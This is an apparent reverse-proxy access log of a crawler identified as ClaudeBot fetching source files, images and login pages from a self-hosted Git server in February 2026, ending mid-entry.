200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11515] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt-requests_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13177] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18120] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Ffallback_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15368] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 216.73.216.188] [Length 11145] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11251] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11719] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14852] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-1_access.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11563] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19904] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.AssemblyInfo.cs" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 